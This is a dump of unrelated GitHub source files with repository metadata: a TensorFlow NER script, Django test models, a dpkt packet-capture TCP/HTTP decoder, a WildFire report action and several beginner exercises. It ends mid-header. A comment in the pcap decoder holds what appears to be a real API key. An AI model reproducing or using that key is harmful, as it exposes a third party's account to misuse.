Python
| false
| false
| 6,730
|
py
|
# -*- coding:utf-8 -*-
from __future__ import print_function, division
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import random
import os
import struct
import util
'''
This is the first version to use lstm and crf to sovle ner problem
'''
#-------------------------function definition-----------------------
def cal_accurency(lb, logit):
l = len(lb)
print ('len is ', l)
print (isinstance(lb[0], int))
total = 0
c = 0
for i in range(l):
b = int(lb[i])
lo = int(logit[i])
if b != 0:
total += 1
if b == lo:
c += 1
print('total is ', total, c)
return ( c, total)
#-----------------------------hyper parameters------------------------
batch_size = 99
max_sequence_length = util.max_sequence_length #default 110
word_embedding = []
word_embedding_size = 0
hidden_size = 120 #the steps of nn, means the number of sequences in an article
num_layers = 10
num_class = 5
epoch_size = 1000
check_size = 20
learning_rate = 0.01
forget_bias = 0.0
input_keep_prob = 1.0
output_keep_prob = 1.0
max_sequence_num = util.max_sequence_num
hidden_size = max_sequence_length
#--------------------------------------------------
init = 0
sess = []
correct_prediction = []
train_op = 0
accuracy = 0
tf_input = 0
tf_target = 0
#--------------------------------------------------
(data, data_ner, word_embedding) = util.loadChineseData()
(batch_size, max_sequence_length, train_set, train_lb, test_set, test_lb) = util.DivideDataSet(data, data_ner)
word_embedding.insert(0, [0 for i in range(len(word_embedding[0]))])
word_embedding_size = len(word_embedding )
word_embedding_dim = len(word_embedding[0])
#def mynet ():
tf_input = tf.placeholder(dtype=tf.int32, shape=[None, max_sequence_length])
tf_target = tf.placeholder(dtype=tf.int32, shape=[None, max_sequence_length])
#class_output = tf.nn.embedding_lookup(np.eye(5,5), tf_target)
map_nertype = [[0 if j != i else 1 for j in range(5)] for i in range(5)]
word_embedding = np.array(word_embedding, dtype=np.float32)
map_nertype = np.array(map_nertype, dtype=np.float32)
cell_input = tf.nn.embedding_lookup(word_embedding, tf_input)
class_output = tf.nn.embedding_lookup(map_nertype, tf_target)
cell_fw = tf.nn.rnn_cell.BasicLSTMCell(hidden_size, forget_bias=forget_bias, state_is_tuple=True)
cell_bk = tf.nn.rnn_cell.BasicLSTMCell(hidden_size, forget_bias=forget_bias, state_is_tuple=True, reuse=True)
#cell_fw = tf.nn.rnn_cell.DropoutWrapper(cell_fw, input_keep_prob=input_keep_prob, output_keep_prob=output_keep_prob)
#cell_bk = tf.nn.rnn_cell.DropoutWrapper(cell_bk, input_keep_prob = input_keep_prob, output_keep_prob=output_keep_prob)
cell_fw = tf.nn.rnn_cell.MultiRNNCell([cell_fw]*num_layers, state_is_tuple=True)
#cell_bk = tf.nn.rnn_cell.MultiRNNCell([cell_bk]*num_layers, state_is_tuple=True)
initial_state_fw = cell_fw.zero_state(hidden_size, dtype=tf.float32)
initial_state_bk = cell_bk.zero_state(hidden_size, dtype=tf.float32)
#inputs_list = [tf.squeeze(s, squeeze_dims=1) for s in tf.split(cell_input, num_or_size_splits=max_sequence_length, axis=1)]
inputs_list = cell_input
print(inputs_list)
# st = tf.split(cell_input, num_or_size_splits=max_sequence_length, axis=1)
# for s in st:
# inputs_list.append(s)
#outputs, state_fw, state_bw = \
# tf.nn.bidirectional_dynamic_rnn(cell_fw, cell_bk, inputs_list, initial_state_fw = initial_state_fw, initial_state_bw = initial_state_bk)
outputs, state_ = tf.nn.dynamic_rnn (cell_fw, inputs=inputs_list, initial_state=initial_state_fw)
print(outputs)
output = tf.reshape( outputs, [-1, hidden_size])
W = tf.get_variable('W', [hidden_size, num_class], dtype=tf.float32, initializer=tf.constant_initializer(2.0))
b = tf.get_variable('b', [num_class], dtype=tf.float32, initializer=tf.constant_initializer(1.0))
logits = tf.matmul(output, W) + b
labels = tf.reshape(class_output, [-1, num_class])
print ('logits', logits)
print ('labels', labels)
#loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=tf.argmax(labels, 1))
#train_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#correct_prediction = tf.equal(tf.argmax(class_output, 2), tf.argmax(logits,2))
cross_entropy = -tf.reduce_mean(labels*tf.log(tf.clip_by_value(logits, 1e-2, 1.0)))
#cross_entropy = tf.reduce_mean(tf.square(labels - logits))
train_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(cross_entropy)
arg_lb = tf.argmax(labels, 1)
arg_logit = tf.argmax(logits, 1)
#correct_prediction = tf.equal(tf.argmax(labels,1), tf.argmax(logits, 1))
#accuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))
init = tf.global_variables_initializer()
sess = tf.Session()
#if __name__ == '__main__':
#--------------------Preservation-----------------------
# (data, data_ner, word_embedding) = util.loadChineseData()
# (batch_size, train_set, train_lb, test_set, test_lb) = util.DivideDataSet(data, data_ner)
# word_embedding.insert(0, [0 for i in range(len(word_embedding[0]))])
word_embedding_size = len(word_embedding )
word_embedding_dim = len(word_embedding[0])
print(word_embedding_size, word_embedding_dim)
#----------------------Run session--------------------------
#fp = open('result.rs', 'w')
train_size = len(train_set) - 1
test_size = len(test_set) - 1
print('train_size:', train_size, 'test_size:', test_size)
sess.run(init)
for i in range(epoch_size):
tr_set = np.reshape(train_set[i%train_size], [-1, max_sequence_length])
tr_lb = np.reshape(train_lb[i%train_size], [-1, max_sequence_length])
sess.run(train_op, feed_dict={tf_input:tr_set , tf_target: tr_lb})
pass
ts_set = np.reshape(test_set[i%test_size], [-1, max_sequence_length])
ts_lb = np.reshape(test_lb[i%test_size], [-1, max_sequence_length])
#ts_set = tf.convert_to_tensor(ts_set)
#ts_lb = tf.convert_to_tensor(ts_lb)
print(type(ts_lb))
#wr = sess.run(output, feed_dict={tf_input:ts_set , tf_target: ts_lb})
#arg_lb = tf.argmax(labels, 1)
#arg_logit = tf.argmax(logits, 1)
cc = 0
tt = 0
for j in range(test_size - 1):
ts_set = np.reshape(test_set[j], [-1, max_sequence_length])
ts_lb = np.reshape(test_lb[j], [-1, max_sequence_length])
arg_lbs = sess.run(arg_lb, feed_dict={tf_input:ts_set , tf_target: ts_lb})
arg_logits = sess.run(arg_logit, feed_dict={tf_input:ts_set , tf_target: ts_lb})
c, t = cal_accurency(arg_lbs, arg_logits)
cc += c
tt += t
print('accuracy:', cc / (float)(tt))
# for i in wr:
# fp.write(str(i) + ' ')
#print('outputs', sess.run(output, feed_dict={tf_input:ts_set , tf_target: ts_lb}))
#print('loss', sess.run(cross_entropy, feed_dict={tf_input:ts_set , tf_target: ts_lb}))
#print ("epoch_size:", i, \
# sess.run(accuracy,feed_dict={tf_input: ts_set, tf_target: ts_lb}))
print('\ndone\n')
|
[
"pandigreat@163.com"
] |
pandigreat@163.com
|
be673d1dcd97eac46f96a396b361d2d97fb3ded2
|
f0700a5cdb1be9f23fd80785908e6abe757458b7
|
/deduce/config.py
|
a822809e08cbef959138864890a64eed2e1d2ce4
|
[
"MIT"
] |
permissive
|
AevoHQ/deduce
|
50a396512e3ff99b1553be452374d74f48990891
|
a94a2afa29a19b5a5e66b45de2e567eecf0cea51
|
refs/heads/master
| 2021-07-07T09:04:41.665084
| 2017-10-01T02:24:11
| 2017-10-01T02:24:11
| 105,410,586
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
"""Aevo Deduce configuration."""
import argparse
def _build_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
"--vault_ip",
help="the IP address of Aevo Vault",
default="http://localhost:3000")
return parser
ARGS = _build_parser().parse_args()
|
[
"grodinh@winchesterthurston.org"
] |
grodinh@winchesterthurston.org
|
8177c9db7f001dff1d8952ae1b336edc002bc305
|
e5ea1c22088e292d9644ba6884530eceaeb41e78
|
/dictionaries 2.py
|
34101a5085d1dfe3ccfa59f012ff0cf1ee341a12
|
[] |
no_license
|
motolanialimi/Northwestern-Data
|
1239687bd3135bcca541f4f1499ef8549a4e338f
|
4e46452b089caf9344767ca449af9b580db424ca
|
refs/heads/master
| 2020-03-14T04:07:10.029089
| 2018-04-28T19:18:13
| 2018-04-28T19:18:13
| 131,434,595
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 691
|
py
|
# Generating Email Addresses
In this activity, you will write a Python script to generate an email address using fields from a csv data file.
## Instructions
* Use csv.DictReader to read the contents of a csv file into a dictionary.
* Use the first_name and last_name keys to create a new email address using the first and last name of the employee. `{"first_name": "John", "last_name": "Glenn"}` would generate the email: `john.glenn@example.com`.
* Create a new dictionary that includes the `first_name`, `last_name`, `ssn`, and `email`.
* Append the new dictionary to a list called `new_employee_data`.
* Use csv.DictWriter to output the new_employee_data to a new csv file.
|
[
"mgbenro@gmail.com"
] |
mgbenro@gmail.com
|
e09a235d7587fa48e4b2ee716bed5829d094224c
|
a923cd0cbff345a558215256764ffde0b2c33582
|
/cms/test_utils/project/placeholderapp/models.py
|
f01b2f989921fcc4fa9c3db4c606ae423bdf4921
|
[] |
no_license
|
manufacturedba/thinkcrunch
|
9b83b78285437500ce22ab277a2a765f61aca61c
|
9bfbc32e9387af8f147c14417641261c0d66d500
|
refs/heads/master
| 2021-03-24T13:33:04.173771
| 2015-05-05T01:44:09
| 2015-05-05T01:44:09
| 17,045,023
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,082
|
py
|
from django.core.urlresolvers import reverse
from cms.utils.compat.dj import python_2_unicode_compatible
from django.db import models
from cms.models.fields import PlaceholderField
from hvad.models import TranslatableModel, TranslatedFields
def dynamic_placeholder_1(instance):
return instance.char_1
def dynamic_placeholder_2(instance):
return instance.char_2
class Example1(models.Model):
char_1 = models.CharField(u'char_1', max_length=255)
char_2 = models.CharField(u'char_2', max_length=255)
char_3 = models.CharField(u'char_3', max_length=255)
char_4 = models.CharField(u'char_4', max_length=255)
placeholder = PlaceholderField('placeholder')
def callable_item(self, request):
return self.char_1
def __str__(self):
return self.char_1
def get_absolute_url(self):
return reverse("detail", args=(self.pk,))
class TwoPlaceholderExample(models.Model):
char_1 = models.CharField(u'char_1', max_length=255)
char_2 = models.CharField(u'char_2', max_length=255)
char_3 = models.CharField(u'char_3', max_length=255)
char_4 = models.CharField(u'char_4', max_length=255)
placeholder_1 = PlaceholderField('placeholder_1', related_name='p1')
placeholder_2 = PlaceholderField('placeholder_2', related_name='p2')
class DynamicPlaceholderSlotExample(models.Model):
char_1 = models.CharField(u'char_1', max_length=255)
char_2 = models.CharField(u'char_2', max_length=255)
placeholder_1 = PlaceholderField(dynamic_placeholder_1, related_name='dynamic_pl_1')
placeholder_2 = PlaceholderField(dynamic_placeholder_2, related_name='dynamic_pl_2')
@python_2_unicode_compatible
class MultilingualExample1(TranslatableModel):
translations = TranslatedFields(
char_1=models.CharField(u'char_1', max_length=255),
char_2=models.CharField(u'char_2', max_length=255),
)
placeholder_1 = PlaceholderField('placeholder_1')
def __str__(self):
return self.char_1
def get_absolute_url(self):
return reverse("detail_multi", args=(self.pk,))
|
[
"manufacturedba@gmail.com"
] |
manufacturedba@gmail.com
|
6fe15fd3c7e16d3a37c5b48ffe8dd2b5102ea873
|
45b4fb25f4cd0e74715a2a811354ff9c45888e73
|
/Old_Py_Files/Check.py
|
12523d8dd988af9f61d33a4a2d53bf467a35ca82
|
[] |
no_license
|
Excloudx6/Measuring_Mobile_Advertisement
|
062577dd97f88b5e51b266289e613312d9c78b18
|
5790eaa04ee12a0cdc7b7752bbf29bd0c03efea6
|
refs/heads/master
| 2023-03-18T15:43:35.364235
| 2015-04-22T04:22:11
| 2015-04-22T04:22:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,349
|
py
|
#!/usr/bin/env python
import dpkt
import sys
import socket
import pcap
import zlib
import struct
def connection_id_to_str (cid, v=4) :
"""This converts the connection ID cid which is a tuple of (source_ip_address, source_tcp_port, destination_ip_address, destination_tcp_port) to a string. v is either 4 for IPv4 or 6 for IPv6"""
if v == 4 :
src_ip_addr_str = socket.inet_ntoa(cid[0])
dst_ip_addr_str = socket.inet_ntoa(cid[2])
return src_ip_addr_str + ":" + str(cid[1])+"=>"+dst_ip_addr_str + ":" + str(cid[3])
elif v == 6 :
src_ip_addr_str = socket.inet_ntop(socket.AF_INET6, cid[0])
dst_ip_addr_str = socket.inet_ntop(socket.AF_INET6, cid[2])
return src_ip_addr_str + "." + str(cid[1])+"=>"+dst_ip_addr_str + "." + str(cid[3])
else :
raise ValueError('Argument to connection_id_to_str must be 4 or 6, is %d' % v)
class Connection_object :
"""A connection object stores the state of the tcp connection"""
def __init__ ( self, isn, seq, string ) :
self.isn = isn # initial sequence number. All sequence numbers are relative to this number.
self.seq = seq # last sequence number seen. I'm not sure I need to keep this.
self.buffer = { seq: string } # the keys are the relative sequence numbers, the values are the strings
class ProtocolException(Exception):
"""Raise this exception if a protocol error is detected, although it is more likely that my software is broken"""
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
def assemble_buffer( buffer_dictionary ) :
"""The buffer dictionary contains segment numbers, which are byte offsets into the stream, and the bytes that the offsets point to. This function assembles the buffer into order. It should raise an exception if there is missing data - this is not implemented"""
return_buffer = ""
for segment in sorted( buffer_dictionary.keys() ) :
read_end = len(return_buffer)
if read_end+1 != segment :
print "There is a segment missing between %d (already read) and %d (current segment beginning)" % ( read_end, segment )
return_buffer = return_buffer + buffer_dictionary[segment]
return return_buffer
def get_message_segment_size (options ) :
"""get the maximum segment size from the options list"""
options_list = dpkt.tcp.parse_opts ( options )
for option in options_list :
if option[0] == 2 :
# The MSS is a 16 bit number dpkt decodes it as a 16
# bit number. An MSS is never going to be bigger than 65496 bytes.
# The most common value is 1460 bytes (IPv4) which 0x05b4 or 1440 bytes (IPv6) which is 0x05a0. The format string ">H" means
# big-endian unsigned 16 bit number. It should be ">L" which is big-endian 32 bit number.
mss = struct.unpack(">H", option[1])
return mss
def unpack_tcp_packet ( tcp ) :
"""tcp packets are the same between IPv4 and IPv6. This function handles decoding tcp packets"""
# We need to get more packets, so return to decode_tcp
return
def decode_tcp(pcap):
"""This function decodes a packet capture file pcap and breaks it up into tcp connections"""
# print "counter\tsrc prt\tdst prt\tflags"
packet_cntr = 0
connection_table = {} # the keys of the table are the connection ID strings: source IP,
# source port, destination IP, destination port. The values are a tuple which is the
# sequence number and a string which is the assembled stream
for ts, buf in pcap:
packet_cntr += 1
# Also, this changes a little bit with IPv6. To tell the difference between IPv4 and IPv6, you have to look
# at the ethertype field, which is given by http://www.iana.org/assignments/ethernet-numbers. IPv4 is 0x800 or 2048
# and IPv6 is 0x86DD or 34525
# This is simplistic - IPv4 packets can be fragmented. Also, this only works for IPv4. IPv6 has a different Ethertype
# Part of the genius of dpkt is that if you have an ethernet packet with an IPv4 payload, you get an dpkt.ip object, but if you
# have an ethernet packet with an IPv6 payload, then you get an dpkt.ip6 object, which has different fields names.
# Note how similar IPv4 and IPv6 are.
ip = dpkt.ip.IP(buf)
if ip.p != dpkt.ip.IP_PROTO_TCP:
print "Not Ip"
continue
tcp = ip.data
print packet_cntr
#if tcp.dport !=80 or tcp.sport !=80:
#print "Not 80"
#continue
connection_id = (ip.src, tcp.sport, ip.dst, tcp.dport)
fin_flag = ( tcp.flags & dpkt.tcp.TH_FIN ) != 0
syn_flag = ( tcp.flags & dpkt.tcp.TH_SYN ) != 0
rst_flag = ( tcp.flags & dpkt.tcp.TH_RST ) != 0
psh_flag = ( tcp.flags & dpkt.tcp.TH_PUSH) != 0
ack_flag = ( tcp.flags & dpkt.tcp.TH_ACK ) != 0
urg_flag = ( tcp.flags & dpkt.tcp.TH_URG ) != 0
ece_flag = ( tcp.flags & dpkt.tcp.TH_ECE ) != 0
cwr_flag = ( tcp.flags & dpkt.tcp.TH_CWR ) != 0
# The flags string is really for debugging
flags = (
( "C" if cwr_flag else " " ) +
( "E" if ece_flag else " " ) +
( "U" if urg_flag else " " ) +
( "A" if ack_flag else " " ) +
( "P" if psh_flag else " " ) +
( "R" if rst_flag else " " ) +
( "S" if syn_flag else " " ) +
( "F" if fin_flag else " " ) )
if syn_flag and not ack_flag :
print "SYNNoACK"
# Each TCP connection is forming. The new connection is stored as an object in a dictionary
# whose key is the tuple (source_ip_address, source_tcp_port, destination_ip_address, destination_tcp_port)
# The connection is stored in a dictionary. The key is the connection_id, value of each key is an object with fields for the
# current connection state and the total of all the bytes that have been sent
# Note that there are two connections, one from the client to the server and one from the server to the client. This becomes
# important when the connection is closed, because one side might FIN the connection well before the other side does.
print socket.inet_ntoa(ip.src)
print "Forming a new connection " + connection_id_to_str( connection_id, ip.v ) + " Initial Sequence Number (ISN) is %d" % tcp.seq
connection_table[connection_id] = Connection_object ( isn = tcp.seq, seq = tcp.seq, string = "" )
print "Message segment size client side is ", get_message_segment_size ( tcp.opts )
elif syn_flag and ack_flag :
print "SYN-ACK"
print "Server responding to a new connection " + connection_id_to_str( connection_id, ip.v ) + " Initial Sequence Number (ISN) is %d" % tcp.seq
connection_table[connection_id] = Connection_object ( isn = tcp.seq, seq = tcp.seq, string = "" )
print "Message segment size client side is ", get_message_segment_size ( tcp.opts )
# This is where I am having a little confusion. My instinct tells me that the connection from the client to the server and the
# connection from the server back to the client should be connected somehow. But they aren't, except for the SYN-ACK
# packet. Otherwise, the source IP, destination IP, source port and destination port are mirror images, but the streams
# are separate. The acknowlegement numbers are related, but we don't need to worry about acknowlegements
# Technically, I don't need to test for the ACK flag since it always set.
elif not syn_flag and ack_flag :
print "NoSYNACK"
sequence_number = tcp.seq
if connection_id not in connection_table:
continue
byte_offset = sequence_number - connection_table[connection_id].isn
# Print flags+" Absolute sequence number %d ISN %d relative sequence number %d" % (sequence_number, connection_table[connection_id].isn, byte_offset)
if tcp.sport==80 and len(tcp.data)>0:
print "Response"
http = dpkt.http.Response(tcp.data)
if 'content-encoding' in http.headers.keys():
#print "Encoded using ", http.headers['content-encoding']
if http.headers['content-encoding']=="gzip":
connection_table[connection_id].buffer[byte_offset]=zlib.decompress(http.body, 16+zlib.MAX_WBITS)
else:
connection_table[connection_id].buffer[byte_offset]=http.body.decode(http.headers['content-encoding'],'strict')
#connection_table[connection_id].buffer[byte_offset] = tcp.data
elif tcp.dport==80 and len(tcp.data)>0:
print "Request"
http = dpkt.http.Request(tcp.data)
#print http.method, http.uri
print http.body
connection_table[connection_id].seq = sequence_number
# if the push flag or urg flag is set, then return the string to the caller, along with identifying information so that the
# caller knows which connection is getting data returned.
if psh_flag or urg_flag :
connection_string = assemble_buffer( connection_table[connection_id].buffer )
yield ( connection_id, connection_string, ip.v )
'''else :
# syn_flag is clear and ack_flag is clear. This is probably a software in my software.
raise ProtocolException ( "In packet %d, SYN is clear and ACK is clear. This is terrible" % packet_cntr )'''
def main(pc) :
"""This is the outer loop that prints strings that have been captured from the TCP streams, terminated by a packet that has the PUSH flag set."""
for connection_id, received_string, ip_version in decode_tcp(pc) :
print connection_id_to_str (connection_id, ip_version)
print received_string
if __name__ == "__main__" :
if len(sys.argv) == 3 :
if sys.argv[1] == "-i" :
# create an interator to return the next packet. The source can be either an interface using the libpcap library or it can be a file in pcap
# format such as created by tcpdump.
pc = pcap.pcap( sys.argv[2] )
elif sys.argv[1] == "-f" :
pc = dpkt.pcap.Reader( open ( sys.argv[2] ) )
else :
print """Use -i INTERFACE to packet capture from an interface. Use -f FILENAME to read a packet capture file"""
sys.exit(2)
main(pc)
|
[
"hchawla@localhost.localdomain"
] |
hchawla@localhost.localdomain
|
49d70620d371ad7f8707c9050d28c5921813b845
|
371b3e735d34c1204e1e26391d378ba01f64fa88
|
/list_iteration.py
|
c6633b46279ed4978949bbc265761c8e6a5f6f94
|
[] |
no_license
|
phperes28/TwilioQuest_Pythonic_Temple
|
1b1509f384396e41dae64b8d50122eba1989a757
|
8c31d743093afa6df70c8b0f165fb1d27c0bede3
|
refs/heads/main
| 2023-05-02T19:22:36.249543
| 2021-05-19T22:18:15
| 2021-05-19T22:18:15
| 369,010,335
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
import sys
# Set up a list for our code to work with that omits the first CLI argument,
# which is the name of our script (list_iteration.py)
order_of_succession = sys.argv
order_of_succession.pop(0)
# Now, order_of_succession is ready for us to work with
for number, name in enumerate(order_of_succession, 1):
print(f"{number}. {name}")
|
[
"noreply@github.com"
] |
phperes28.noreply@github.com
|
f0b7d7e7fc94ffb6f353f980d51003d24f13f2dc
|
5a9c19c8ff43a37549c187bd1a1f28ca3ea8c5f9
|
/Diena_1_4_thonny/d3_g2_u1.py
|
768d80ecc9c0bcea3a2e5ad03f857697aedb7ced
|
[
"MIT"
] |
permissive
|
komunikator1984/Python_RTU_08_20
|
a570e5a1b15b9289f277173245be1b189828adbf
|
773314e2586cc63fcb659aa8466bad7d3f8910c9
|
refs/heads/master
| 2023-07-22T04:24:56.544299
| 2021-08-30T18:02:38
| 2021-08-30T18:02:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
#1 Uzdevums
# temper = float(input("What is your temperature? "))
# if temper < 35:
# print('nav par aukstu')
# elif 35 <= temper <= 37:
# print('viss kārtībā')
# else:
# print('iespējams drudzis')
temp=float(input("Nelabi izskaties, negribi pamērīt temperatūru!"))
low_temp=35
high_temp=36.9
if temp < low_temp:
print ("nav par aukstu?")
elif temp >= low_temp and temp <= high_temp:
print ("Dzīvo mierā! Viss ir kārtībā!")
else: # atliek temp > high_temp
print ("iespējāms drudzis")
|
[
"valdis.s.coding@gmail.com"
] |
valdis.s.coding@gmail.com
|
86646b40c2a9ea4e540a82176126cb6e6246a07d
|
3ca540f95c470007258a1e3bb4207dc9b19bae8a
|
/SCRAM/BuildSystem/BuildData.py
|
1da3fd611c44a33dabafcfb5d54830d2333d5b58
|
[
"MIT"
] |
permissive
|
cms-sw/SCRAM
|
41a23e9a1ecc3c17c1352008ab0f703aea58d406
|
e52fe9958b62fae3531fa8f62f2d554218f3fe02
|
refs/heads/SCRAMV3
| 2023-08-07T17:17:03.613656
| 2023-07-25T23:39:26
| 2023-07-25T23:39:26
| 9,367,918
| 9
| 3
|
NOASSERTION
| 2023-07-25T23:39:28
| 2013-04-11T10:38:28
|
Python
|
UTF-8
|
Python
| false
| false
| 899
|
py
|
from os.path import dirname
from os import environ
from SCRAM.BuildSystem import get_safename
class BuildData(object):
def __init__(self, bf, cdata):
self.branch = {}
self.branch["template"] = cdata[0]
self.branch["name"] = get_safename(cdata[1])
self.branch["class"] = cdata[0].upper()
self.branch["safepath"] = get_safename(cdata[1])
self.branch["classdir"] = cdata[1]
self.branch["path"] = cdata[1]
self.branch["parent"] = dirname(cdata[1])[len(environ['SCRAM_SOURCEDIR']) + 1:]
if bf:
self.branch["metabf"] = [bf]
self.branch["suffix"] = cdata[2]
self.branch["context"] = {}
def name(self):
return self.branch['name']
def variables(self):
return ""
def branchdata(self):
return self.branch
def parent(self):
return self.branch['parent']
|
[
"Shahzad.Malik.Muzaffar@cern.ch"
] |
Shahzad.Malik.Muzaffar@cern.ch
|
68244c76a59c4421feddac89c052dcdb8d338699
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_237/ch4_2019_02_26_19_03_15_156978.py
|
c0123d5ee4920cd345436ace4c8de2d22e6fb36d
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 153
|
py
|
def classifica_idade(idade):
if idade <= 11:
return "crianca"
elif 12<= idade <18:
return "adolescente"
elif idade>=18:
return "adulto"
|
[
"you@example.com"
] |
you@example.com
|
889e8ac4ad1efe5805a9d7a41d93b49b525b40fa
|
46076543cb0b7d602d83dba23f6441683cabf24a
|
/PycharmProjects/aerology/__Files__/__init__.py
|
0ba9d1c19b915180aacf0ce89993c5b3896d4a52
|
[] |
no_license
|
gaurBrijesh/Python
|
5838ee7e8d427597a915e73d3f39f22ce20da9c3
|
0d97068aa95218e96e17b919def7ed2573acba2f
|
refs/heads/master
| 2021-01-25T07:48:46.844872
| 2017-07-17T10:44:14
| 2017-07-17T10:44:14
| 93,660,503
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 85
|
py
|
file1 = open('/home/brijesh/Downloads/text.txt','r')
data = file1.read()
print (data)
|
[
"nanosoft10@gmail.com"
] |
nanosoft10@gmail.com
|
81cc8e61b33e55e7f9fe5aa8e1b9ccb893a5294b
|
e3b9aa9b17ebb55e53dbc4fa9d1f49c3a56c6488
|
/paloalto_wildfire/komand_paloalto_wildfire/actions/get_report/action.py
|
0cdc2266a782da05d0b112d30b11a1bf2e0dd4a4
|
[
"MIT"
] |
permissive
|
OSSSP/insightconnect-plugins
|
ab7c77f91c46bd66b10db9da1cd7571dfc048ab7
|
846758dab745170cf1a8c146211a8bea9592e8ff
|
refs/heads/master
| 2023-04-06T23:57:28.449617
| 2020-03-18T01:24:28
| 2020-03-18T01:24:28
| 248,185,529
| 1
| 0
|
MIT
| 2023-04-04T00:12:18
| 2020-03-18T09:14:53
| null |
UTF-8
|
Python
| false
| false
| 1,615
|
py
|
import komand
from .schema import GetReportInput, GetReportOutput
# Custom imports below
import requests
import base64
class GetReport(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='get_report',
description='Query for an XML or PDF report for a particular sample',
input=GetReportInput(),
output=GetReportOutput())
def run(self, params={}):
"""TODO: Run action"""
endpoint = "/publicapi/get/report"
client = self.connection.client
url = 'https://{}/{}'.format(self.connection.host, endpoint)
# Formatted with None and tuples so requests sends form-data properly
# => Send data, 299 bytes (0x12b)
# 0000: --------------------------8557684369749613
# 002c: Content-Disposition: form-data; name="apikey"
# 005b:
# 005d: 740219c8fab2606b9206b2d40626b2d1
# 007f: --------------------------8557684369749613
# 00ab: Content-Disposition: form-data; name="format"
# 00d8:
# 00da: pdf
# 00fd: --------------------------8557684369749613--
# ...
req = {
'apikey': (None, self.connection.api_key),
'hash': (None, params.get('hash')),
'format': (None, params.get('format'))
}
r = requests.post(url, files=req)
out = base64.b64encode(r.content).decode()
return { 'report': out }
def test(self):
"""TODO: Test action"""
client = self.connection.client
return { 'report': 'Test' }
|
[
"jonschipp@gmail.com"
] |
jonschipp@gmail.com
|
0c95a06f5f6200635c3986d24ecc5e8183e403eb
|
f9609ff4f2bbea570f3cb4cd3f9fe6b3595d4145
|
/commands/cmd_wizhelp.py
|
b0ab54a543e9859900087165a76b11ca5f6ca68b
|
[] |
no_license
|
VladThePaler/PythonWars-1996
|
2628bd2fb302faacc91688ad942799537c974f50
|
d8fbc27d90f1deb9755c0ad0e1cf2c110f406e28
|
refs/heads/master
| 2023-05-08T19:51:28.586440
| 2021-05-14T04:19:17
| 2021-05-14T04:19:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,819
|
py
|
# PythonWars copyright © 2020, 2021 by Paul Penner. All rights reserved.
# In order to use this codebase you must comply with all licenses.
#
# Original Diku Mud copyright © 1990, 1991 by Sebastian Hammer,
# Michael Seifert, Hans Henrik Stærfeldt, Tom Madsen, and Katja Nyboe.
#
# Merc Diku Mud improvements copyright © 1992, 1993 by Michael
# Chastain, Michael Quan, and Mitchell Tse.
#
# GodWars improvements copyright © 1995, 1996 by Richard Woolcock.
#
# ROM 2.4 is copyright 1993-1998 Russ Taylor. ROM has been brought to
# you by the ROM consortium: Russ Taylor (rtaylor@hypercube.org),
# Gabrielle Taylor (gtaylor@hypercube.org), and Brian Moore (zump@rom.org).
#
# Ported to Python by Davion of MudBytes.net using Miniboa
# (https://code.google.com/p/miniboa/).
#
# In order to use any part of this Merc Diku Mud, you must comply with
# both the original Diku license in 'license.doc' as well the Merc
# license in 'license.txt'. In particular, you may not remove either of
# these copyright notices.
#
# Much time and thought has gone into this software, and you are
# benefiting. We hope that you share your changes too. What goes
# around, comes around.
import interp
import merc
# noinspection PyUnusedLocal
def cmd_wizhelp(ch, argument):
buf = []
col = 0
for key, cmd in interp.cmd_table.items():
if merc.LEVEL_HERO <= cmd.level <= ch.trust and cmd.show:
buf += "{:<12}".format(key)
col += 1
if col % 6 == 0:
buf += "\n"
if col % 6 != 0:
buf += "\n"
ch.send("".join(buf))
interp.register_command(
interp.CmdType(
name="wizhelp",
cmd_fun=cmd_wizhelp,
position=merc.POS_DEAD, level=4,
log=merc.LOG_NORMAL, show=True,
default_arg=""
)
)
|
[
"jindrak@gmail.com"
] |
jindrak@gmail.com
|
5c271c70118c583d3b6474323b81753d0d70e29a
|
9f8221151b05e5acdf870cd7dd20a57323600deb
|
/lab_1_stub/fizzbuzzgolf.py
|
3e94ef4367bc431a32eb373d297dd5d702d4c486
|
[] |
no_license
|
HUFGhani/Software-Engineering-Concepts-In-Practice
|
b35e62e2b55af580eca93fc39fe197c729551406
|
1ed0d7c2f7a30c2bc9216127a39d2370013c9d6c
|
refs/heads/master
| 2021-07-24T15:00:25.962591
| 2017-10-13T09:31:29
| 2017-10-13T09:31:29
| 104,791,206
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 83
|
py
|
print ('\n'.join("Fizz"*(i%3==0)+"Buzz"*(i%5==0) or str(i) for i in range(1,101)))
|
[
"h.u.f.ghani@gmail.com"
] |
h.u.f.ghani@gmail.com
|
57c4ea5eb70c15ea7a90b28b122de6a2f363a5f5
|
3756357852562a6c8fe48f983e0da1610d10ce9c
|
/DeepSecuritySDK/DeepSecurityAPI/models/interface.py
|
5686431ca3f436bd5cd0364a5e04242e5ed876dc
|
[] |
no_license
|
johnsobm/deepsecuritySDK
|
5de8c788d190fa8c5b67fb0bb6b4c545ba74c754
|
d15ef79aea91d0c9a3a2bb4ac71b8060e0b67bfd
|
refs/heads/master
